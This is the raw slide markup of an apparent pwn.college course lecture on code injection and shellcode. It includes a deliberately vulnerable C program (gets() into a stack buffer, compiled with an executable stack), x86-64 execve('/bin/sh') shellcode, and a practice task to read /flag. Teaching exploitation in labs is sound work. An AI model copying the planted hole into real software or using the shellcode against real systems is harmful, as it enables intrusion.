              <a:t>		print out a log of the system calls (like strace)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	-g 1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>		wait for a gdb connection on port 1234. Connect with</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>				</a:t>
            </a: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target remote localhost:1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> in </a:t>
            </a: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gdb-multiarch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6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Practice!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Google Shape;329;p6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Head over to </a:t>
            </a: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pwn.college</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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Choose a level.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Understand the constraints or changes done on your shellcode.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Write shellcode to bypass them and read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>/flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503250" y="3254950"/>
            <a:ext cx="81375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John Mauchly (Physicist), John Presper Eckert (Electrical Engineer), John Von Neumann (Mathematician)</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="224" name="Google Shape;224;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="15554" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="715675" y="459123"/>
            <a:ext cx="5173800" cy="279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5"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10504" l="0" r="0" t="5049"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5882775" y="459125"/>
            <a:ext cx="2538850" cy="27958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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503250" y="4077650"/>
            <a:ext cx="81375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John von Neumann, First Draft of a Report on the EDVAC, 1945.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Von Neumann Architecture vs Harvard Architecture</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="Google Shape;232;p4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Von Neumann architecture sees (and stores) code as data.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Harvard architecture stores data and code separately.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Almost all general-purpose architectures (x86, ARM, MIPS, PPC, SPARC, etc) are Von Neumann.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Harvard architectures pop up in embedded use-cases (AVR, PIC).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happens if data and code get mixed up?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shellcode get injected?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;238;p4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bye1() { puts("Goodbye!");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bye2() { puts("Farewell!");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hello(char *name, void (*bye_func)())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printf("Hello %s!\n",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bye_func();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int main(int argc, char **argv)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char name[1024];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gets(name);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srand(time(0));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if (rand() % 2) hello(bye1,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else hello(name, bye2);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Compile with: gcc -z execstack -o hello hello.c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bye1() { puts("Goodbye!");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bye2() { puts("Farewell!");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hello(char *name, void (*bye_func)())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printf("Hello %s!\n",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bye_func();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int main(int argc, char **argv)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char name[1024];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gets(name);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srand(time(0));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if (rand() % 2) hello(bye1,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else hello(name, bye2);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Compile with: gcc -z execstack -o hello hello.c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4" name="Google Shape;244;p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shellcode get injected?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="245" name="Google Shape;245;p48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3234600" y="2065500"/>
            <a:ext cx="64800" cy="1660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6" name="Google Shape;246;p48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2014200" y="2062800"/>
            <a:ext cx="769500" cy="1663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shellcode get injected?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Google Shape;252;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874000" y="1933199"/>
            <a:ext cx="1782000" cy="557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lectrolize"/>
                <a:ea typeface="Electrolize"/>
                <a:cs typeface="Electrolize"/>
                <a:sym typeface="Electrolize"/>
              </a:rPr>
              <a:t>.text</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Electrolize"/>
              <a:ea typeface="Electrolize"/>
              <a:cs typeface="Electrolize"/>
              <a:sym typeface="Electrolize"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Google Shape;253;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874000" y="3048250"/>
            <a:ext cx="1782000" cy="557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lectrolize"/>
                <a:ea typeface="Electrolize"/>
                <a:cs typeface="Electrolize"/>
                <a:sym typeface="Electrolize"/>
              </a:rPr>
              <a:t>stack</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Electrolize"/>
              <a:ea typeface="Electrolize"/>
              <a:cs typeface="Electrolize"/>
              <a:sym typeface="Electrolize"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Google Shape;254;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874000" y="3605386"/>
            <a:ext cx="1782000" cy="557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lectrolize"/>
                <a:ea typeface="Electrolize"/>
                <a:cs typeface="Electrolize"/>
                <a:sym typeface="Electrolize"/>
              </a:rPr>
              <a:t>heap</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Electrolize"/>
              <a:ea typeface="Electrolize"/>
              <a:cs typeface="Electrolize"/>
              <a:sym typeface="Electrolize"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="Google Shape;255;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874000" y="2490335"/>
            <a:ext cx="1782000" cy="557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lectrolize"/>
                <a:ea typeface="Electrolize"/>
                <a:cs typeface="Electrolize"/>
                <a:sym typeface="Electrolize"/>
              </a:rPr>
              <a:t>.bss</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Electrolize"/>
              <a:ea typeface="Electrolize"/>
              <a:cs typeface="Electrolize"/>
              <a:sym typeface="Electrolize"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="Google Shape;256;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874000" y="1375274"/>
            <a:ext cx="1782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Electrolize"/>
                <a:ea typeface="Electrolize"/>
                <a:cs typeface="Electrolize"/>
                <a:sym typeface="Electrolize"/>
              </a:rPr>
              <a:t>PROCESS MEMORY</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Electrolize"/>
              <a:ea typeface="Electrolize"/>
              <a:cs typeface="Electrolize"/>
              <a:sym typeface="Electrolize"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="257" name="Google Shape;257;p49"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="252" idx="1"/>
            <a:endCxn id="253" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874000" y="2211899"/>
            <a:ext cx="600" cy="1115100"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val -39687500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49"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3234600" y="2065500"/>
            <a:ext cx="64800" cy="1660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9" name="Google Shape;259;p49"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2014200" y="2062800"/>
            <a:ext cx="769500" cy="1663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0" name="Google Shape;260;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="4818825" y="2678700"/>
            <a:ext cx="15552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bye_func();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1" name="Google Shape;261;p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bye1() { puts("Goodbye!");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bye2() { puts("Farewell!");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hello(char *name, void (*bye_func)())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printf("Hello %s!\n",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bye_func();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int main(int argc, char **argv)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char name[1024];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gets(name);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srand(time(0));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if (rand() % 2) hello(bye1,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else hello(name, bye2);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Compile with: gcc -z execstack -o hello hello.c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Concept: Code Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Google Shape;267;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="518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Code injection was used in one of the earliest documented exploits: the Morris worm.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Roboto Light"/>
              <a:buChar char="-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Among other attack vectors, overflowed stack buffer in the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fingerd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 service.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-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Injected shellcode to gain a foothold on the machine.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-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Scanned adjacent hosts and infected them to propagate the worm.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-"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1800">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Shut down the internet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.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="268" name="Google Shape;26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4110" y="0"/>
            <a:ext cx="34198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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4962000"/>
            <a:ext cx="55863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Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Try it yourself! https://blog.rapid7.com/2019/01/02/the-ghost-of-exploits-past-a-deep-dive-into-the-morris-worm/</a:t>
            </a:r>
            <a:endParaRPr sz="6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"shell"code?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="Google Shape;275;p5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Usually, the goal of an exploit is to achieve arbitrary command execution.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 typical attack goal is to launch a shell: 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execve("/bin/sh", NULL, NULL)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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rax, 59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this is the syscall number of execve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lea rdi, [rip+binsh]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points the first argument of execve at the /bin/sh string below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rsi, 0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this makes the second argument, argv, NULL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mov rdx, 0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this makes the third argument, envp, NULL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syscall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this triggers the system call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binsh:				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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a label marking where the /bin/sh string is</a:t>
            </a:r>
            <a:endParaRPr sz="10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.string "/bin/sh"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Thus: "shellcode".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Tangent: DATA in your CODE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="Google Shape;281;p5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.string "/bin/sh"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/>
              <a:t>???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intersperse arbitrary data in your shellcode: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.byte 0x48, 0x45, 0x4C, 0x4C, 0x4F	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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"HELLO"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="14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4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.string "HELLO"					</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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"HELLO\0"</a:t>
            </a:r>
            <a:endParaRPr sz="14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Other ways to embed data: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mov rbx, 0x0068732f6e69622f	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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move "/bin/sh\0" into rbx</a:t>
            </a:r>
            <a:endParaRPr sz="14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push rbx					</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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push "/bin/sh\0" onto the stack</a:t>
            </a:r>
            <a:endParaRPr sz="14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mov rdi, rsp				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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# point rdi at the stack</a:t>
            </a:r>
            <a:endParaRPr sz="14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ashvili 2017.08b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ashvili 2017.08b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